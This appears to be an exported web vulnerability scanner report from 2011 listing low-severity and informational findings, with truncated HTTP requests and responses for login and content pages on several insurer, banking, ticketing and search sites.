| HTTP/1.1 200 OK Server: nginx/0.7.67 Date: Mon, 16 May 2011 15:19:40 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.2-1 Set-Cookie: PHPSESSID=3oik1g2sp4 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: success=deleted; expires=Sun, 16-May-2010 15:19:39 GMT Set-Cookie: success_cookie_name Vary: Accept-Encoding Content-Length: 6267 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content-T ...[SNIP]... <div id="login"> <form id="loginForm" method="post" action="https://www <span id="error_login" class="error"> ...[SNIP]... </div><input type="password" id="password" name="password"/><div class="clear"> ...[SNIP]... | 
| Severity: | Low | 
| Confidence: | Certain | 
| Host: | https://www.planservices | 
| Path: | /regions/ | 
| GET /regions/ HTTP/1.1 Host: www.planservices.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close | 
| HTTP/1.1 200 OK Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Content-Type: text/html; charset=UTF-8 Content-Language: en-US Expires: 01 Nov 1990 01:00:01 GMT P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT",policyref=/w3c/p3p Set-Cookie: TESTCOOKIES=Test;expires Set-Cookie: CFID=52158672;expires=Wed Set-Cookie: CFTOKEN=42630575;expires Set-Cookie: JSESSIONID=0430e8dac Set-Cookie: PLANID=;path=/ Set-Cookie: GROUPID=;path=/ Set-Cookie: IID=;path=/ Set-Cookie: WEBUSAGE=124614;path=/ Set-Cookie: USERINTERNAL=0;path=/ Set-Cookie: VIRTDIR=regions;path=/ Date: Mon, 16 May 2011 16:46:14 GMT Connection: close <script type="text/javascript" language="javascript"> var str="launch,Bisys var urlLocation = self.location.href ...[SNIP]... <td ALIGN="LEFT" VALIGN="TOP"> <form NAME="LogonForm" ACTION="ProcessLogon.cfm" METHOD=POST onSubmit="return _CF_checkLogonForm(this)" <table ID="LogonTable" WIDTH="375" cellspacing="2" cellpadding="2" BORDER=0 bgcolor="#6E8F30" STYLE="{font-family: Arial; font-size: 13px;}"> ...[SNIP]... <TD><INPUT TYPE="password" NAME="WebUserID" VALUE="" SIZE="16" MAXLENGTH="25" tabindex="1"></TD> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Firm | 
| Host: | http://www.xsnet.com | 
| Path: | /it-asset-disposition | 
| GET /it-asset-disposition Host: www.xsnet.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.xsnet.com/ Cookie: .ASPXANONYMOUS=XJ4on | 
| HTTP/1.1 200 OK Cache-Control: private Content-Length: 50347 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 P3P: policyref="http://www X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Date: Mon, 16 May 2011 17:08:16 GMT <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head id="Head"> <script type="text/javascript"> //<![CDATA[ window.hubspot= //]]> </script> <meta id="MetaDescription" name="description" content="XSi provides IT Asset Disposition Services for Enterprise IT Equipment"><meta id="MetaKeywords" name="keywords" content=" ITAD, asset disposition, asset recovery, recycling"><meta id="MetaCopyright" name="copyright" content="Copyright (c) 2011 by "><meta id="MetaGenerator" name="generator" content="HubSpot "><meta id="MetaAuthor" name="author"><meta http-equiv="X-UA <style id="StylePlaceholder" type="text/css"></style> <script type="text/javascript" src="/sw/website/web-all <link rel="Stylesheet" href="/sw/website/web-all <link id="_Portals__default <script src="http://cdn <script src="/Portals/64787/js <meta name="google-site <style> <!-- --> </style> <link href="http://www.xsnet XSi's ITAD Services </title><link rel="stylesheet" href="//static.hubspot <script type="text/javascript" src="//static.hubspot.com <link rel="alternate" type="applica ...[SNIP]... | 
| GET /it-asset-disposition Host: www.xsnet.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: .ASPXANONYMOUS=XJ4on | 
| HTTP/1.1 200 OK Cache-Control: private Content-Length: 50347 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 P3P: policyref="http://www X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Date: Mon, 16 May 2011 17:08:21 GMT <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html> <head id="Head"> <script type="text/javascript"> //<![CDATA[ window.hubspot= //]]> </script> <meta id="MetaDescription" name="description" content="XSi provides IT Asset Disposition Services for Enterprise IT Equipment"><meta id="MetaKeywords" name="keywords" content=" ITAD, asset disposition, asset recovery, recycling"><meta id="MetaCopyright" name="copyright" content="Copyright (c) 2011 by "><meta id="MetaGenerator" name="generator" content="HubSpot "><meta id="MetaAuthor" name="author"><meta http-equiv="X-UA <style id="StylePlaceholder" type="text/css"></style> <script type="text/javascript" src="/sw/website/web-all <link rel="Stylesheet" href="/sw/website/web-all <link id="_Portals__default <script src="http://cdn <script src="/Portals/64787/js <meta name="google-site <style> <!-- --> </style> <link href="http://www.xsnet XSi's ITAD Services </title><link rel="stylesheet" href="//static.hubspot <script type="text/javascript" src="//static.hubspot.com <link rel="alternate" type="application/rss+xml ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://cigna.com | 
| Path: | / | 
| GET / HTTP/1.1 Host: cigna.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* | 
| HTTP/1.1 200 OK Server: Netscape-Enterprise/6.0 Date: Mon, 16 May 2011 15:29:10 GMT Content-type: text/html Cache-control: no-cache Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <!--Note: formatting/beautifying this code seems to break something. Leave as-is. --> <html> <head> ...[SNIP]... </script> <form name="dataform" onsubmit="javascript <!-- <form name="dataform" action="http://cigna ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.frontrowusa | 
| Path: | / | 
| GET / HTTP/1.1 Host: www.frontrowusa.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:22:42 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User Set-Cookie: PHPSESSID=b0i6udgq1j Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 19514 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content- ...[SNIP]... <div style="width:175px; padding-top: 35px;" > <form name="ccoptin" action="http://visitor ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.frontrowusa | 
| Path: | /Concerts/U2_Tickets.htm | 
| GET /Concerts/U2_Tickets.htm HTTP/1.1 Host: www.frontrowusa.com Proxy-Connection: keep-alive Referer: http://www.frontrowusa User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=kqn1ntpgpq | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:26:37 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 26045 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content- ...[SNIP]... <div style="width:175px; padding-top: 35px;" > <form name="ccoptin" action="http://visitor ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.frontrowusa | 
| Path: | /Event/U2_Rescheduled | 
| GET /Event/U2_Rescheduled Host: www.frontrowusa.com Proxy-Connection: keep-alive Referer: http://www.frontrowusa User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=kqn1ntpgpq | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:26:43 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 80972 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content- ...[SNIP]... <div style="width:175px; padding-top: 35px;" > <form name="ccoptin" action="http://visitor ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.frontrowusa | 
| Path: | /Sell-Tickets | 
| GET /Sell-Tickets HTTP/1.1 Host: www.frontrowusa.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=kqn1ntpgpq | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:26:07 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 15495 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content- ...[SNIP]... <div style="width:175px; padding-top: 35px;" > <form name="ccoptin" action="http://visitor ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.frontrowusa | 
| Path: | /Sports_Tickets | 
| GET /Sports_Tickets HTTP/1.1 Host: www.frontrowusa.com Proxy-Connection: keep-alive Referer: http://www.frontrowusa User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=kqn1ntpgpq | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:26:01 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 17066 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content- ...[SNIP]... <div style="width:175px; padding-top: 35px;" > <form name="ccoptin" action="http://visitor ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.frontrowusa | 
| Path: | /Cart | 
| GET /Cart HTTP/1.1 Host: www.frontrowusa.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=kqn1ntpgpq | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:26:25 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13094 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content- ...[SNIP]... <div style="width:175px; padding-top: 35px;" > <form name="ccoptin" action="http://visitor ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.frontrowusa | 
| Path: | /Cart/Address | 
| GET /Cart/Address HTTP/1.1 Host: www.frontrowusa.com Connection: keep-alive Referer: http://www.frontrowusa User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=kqn1ntpgpq | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:27:31 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 32907 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content- ...[SNIP]... <div style="width:175px; padding-top: 35px;" > <form name="ccoptin" action="http://visitor ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://www.frontrowusa | 
| Path: | /members/login | 
| GET /members/login HTTP/1.1 Host: www.frontrowusa.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=kqn1ntpgpq | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 15:26:12 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding,User Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 13047 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="Content- ...[SNIP]... <div style="width:175px; padding-top: 35px;" > <form name="ccoptin" action="http://visitor ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.mycigna.com | 
| Path: | / | 
| GET / HTTP/1.1 Host: www.mycigna.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* | 
| HTTP/1.1 200 OK content-type: text/html date: Mon, 16 May 2011 15:29:47 GMT last-modified: Sun, 15 May 2011 10:00:00 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: WebSEAL/6.0.0.3 (Build 060807) Content-Length: 297 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN"> <HTML> <HEAD> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <TITLE></TITLE> </HEAD> <body onLoad="document.webseal <form name="webseal" method="post" action="https://my.cigna ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://ol5u8o2ka38be | 
| Path: | /gadgets/ifr | 
| GET /gadgets/ifr?url=http:/ Host: ol5u8o2ka38be34j62kt Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* | 
| HTTP/1.1 200 OK P3P: CP="CAO PSA OUR" Content-Type: text/html; charset=UTF-8 Expires: Mon, 16 May 2011 14:37:39 GMT Cache-Control: private,max-age=300 Date: Mon, 16 May 2011 14:32:39 GMT X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block Server: GSE Content-Length: 121626 <html><head><script> ...[SNIP]... <div id="paging_controls" style="overflow: hidden; padding: 2px 0px 4px 6px;"> <a href="http://fcgadgets ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://phx.corporate-ir | 
| Path: | /phoenix.zhtml | 
| GET /phoenix.zhtml?c=65036&p Host: phx.corporate-ir.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.regions.com | 
| HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 21117 Cache-Control: private, max-age=57 Date: Mon, 16 May 2011 15:52:29 GMT Connection: close <html><!--###PHBoeHBhZ2U ...[SNIP]... <div id="mcHeaderImage"><img src="http://www.regions ...[SNIP]... <td width="106"><a href="http://thomson ...[SNIP]... <br /><a href="http://thomson ...[SNIP]... <span class="ccbnDisclaimer" ...[SNIP]... <br><a href="http://www ...[SNIP]... <img src="http://media ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | https://securebank | 
| Path: | /SystemUnavailable.aspx | 
| GET /SystemUnavailable.aspx Host: securebank.regions.com Connection: keep-alive Referer: https://www.regions.com Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: securebank.regions.com | 
| HTTP/1.1 200 OK Set-Cookie: securebank.regions.com Cache-Control: no-cache, no-store Date: Mon, 16 May 2011 15:20:16 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/6.0 PICS-Label: (PICS-1.0 "http://www.rsac.org X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Vary: Accept-Encoding Content-Length: 4559 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <HTML> <HEAD> <title>Regions Online Banking</title> <link href="https://secureb ...[SNIP]... <noscript> <img alt='' border='0' name='DCSIMG' width='1' height='1' src='https://statse </noscript> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.google.com | 
| Path: | /search | 
| GET /search?sourceid=chrome Host: www.google.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PREF=ID=381be2a5a4e321de | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 14:45:15 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Get-Dictionary: /sdch/vD843DpA.dct Server: gws X-XSS-Protection: 1; mode=block Content-Length: 80284 <!doctype html> <head> <title>flyerboard code - Google Search</title> <script>window.google= ...[SNIP]... <li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qsj(this) ...[SNIP]... <h3 class="r"><a href="http://www.paperg ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <h3 class="r"><a href="http://www.paperg ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <h3 class="r"><a href="http://www.paperg ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <h3 class="r"><a href="http://www.paperg ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <h3 class="r"><a href="http://www ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <h3 class="r"><a href="http://techcrunch ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <h3 class="r"><a href="http://techcrunch ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <h3 class="r"><a href="http://outside ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <h3 class="r"><a href="http://www ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <h3 class="r"><a href="https://myinvo ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.google.com | 
| Path: | /search | 
| GET /search?q=paperg&ie=utf-8 Host: www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Cookie: PREF=ID=a84248b084119e14 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 16:24:00 GMT Expires: -1 Cache-Control: private, max-age=0 Content-Type: text/html; charset=UTF-8 Server: gws X-XSS-Protection: 1; mode=block Content-Length: 69931 <!doctype html> <head> <title>paperg - Google Search</title> <script>window.google= ...[SNIP]... </div><a id=gb_36 href="http://www.youtube ...[SNIP]... <h3 class="r"><a href="http://www.paperg ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <div class=sld><a class=sla href="http://www.paperg ...[SNIP]... <div class=sld><a class=sla href="http://www.paperg ...[SNIP]... <div class=sld><a class=sla href="http://www.paperg ...[SNIP]... <div class=sld><a class=sla href="http://www.paperg ...[SNIP]... <div class=sld><a class=sla href="http://www.paperg ...[SNIP]... <div class=sld><a class=sla href="http://www.paperg ...[SNIP]... <h3 class="r"><a href="http://www.paperg ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <h3 class="r"><a href="http://www.paperg ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <h3 class="r"><a href="http://www.paperg ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <h3 class="r"><a href="http://twitter.com ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <h3 class="r"><a href="http://www ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <h3 class="r"><a href="http://venturebeat ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <h3 class="r"><a href="http://paidcontent ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <h3 class="r"><a href="http://techcrunch ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <h3 class="r"><a href="http://www ...[SNIP]... <span class=gl><a href="http://webcache ...[SNIP]... <div><a href="http://www.chron ...[SNIP]... <div><a href="http://www ...[SNIP]... <div><a href="http://www ...[SNIP]... <div><a href="http://www ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.mycigna.com | 
| Path: | /sslreq.html | 
| GET /sslreq.html?page= Host: www.mycigna.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PD_STATEFUL_e5fd496c-4b84 | 
| HTTP/1.1 200 OK content-type: text/html date: Mon, 16 May 2011 15:29:50 GMT last-modified: Fri, 13 May 2011 17:36:59 GMT p3p: CP="NON CUR OTPi OUR NOR UNI" server: WebSEAL/6.0.0.3 (Build 060807) Content-Length: 2075 <html><head><title <META NAME="robots" CONTENT="noindex"> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"> <META HTTP-EQUIV="refresh" CONTENT="10;u ...[SNIP]... <br>If you are not redirected in 10 seconds please click here: <a href="https://my.cigna ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.paperg.com | 
| Path: | /flyerboard/albany-times | 
| GET /flyerboard/albany-times Host: www.paperg.com Proxy-Connection: keep-alive Referer: http://www.paperg.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utma=27786045 | 
| HTTP/1.1 200 OK Date: Mon, 16 May 2011 14:48:00 GMT Server: Apache X-Powered-By: PHP/5.3.3-7+squeeze1 P3P: CP="CAO PSA OUR" Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Type: text/html Connection: Keep-alive Via: 1.1 AN-0016020122637050 Content-Length: 5515 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> ...[SNIP]... <div id="header"> <a href="http://www ...[SNIP]... </div> <script src="https://ssl.google </script> ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regions.com | 
| Path: | /wrapperHeader.aspx | 
| GET /wrapperHeader.aspx?p=477 HTTP/1.1 Host: www.regions.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.regions.com Cookie: WWW.REGIONS.COM-HTTP | 
| HTTP/1.1 200 OK Set-Cookie: WWW.REGIONS.COM-HTTP Cache-Control: private Date: Mon, 16 May 2011 15:52:29 GMT Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Vary: Accept-Encoding Content-Length: 12625 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="ctl00_Head1"><titl ...[SNIP]... <li><a href="https://www ...[SNIP]... <li><a href="https://secure ...[SNIP]... <li><a href="https://www ...[SNIP]... <li><a href="https://mymortgage ...[SNIP]... <li><a href="https://www ...[SNIP]... <li><a href="https://www ...[SNIP]... <li><a href="http://www ...[SNIP]... <li><a href="https://www ...[SNIP]... <li><a href="https://www ...[SNIP]... <div><img alt="DCSIMG" id="DCSIMG" width="1" height="1" src="https://statse ...[SNIP]... | 
| Severity: | Information | 
| Confidence: | Certain | 
| Host: | http://www.regionsmo | 
| Path: | /Error/Error | 
| GET /Error/Error?aspxerr Host: www.regionsmortgage.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NSC_uppmt.sfhjpot.dpn-xfc | 
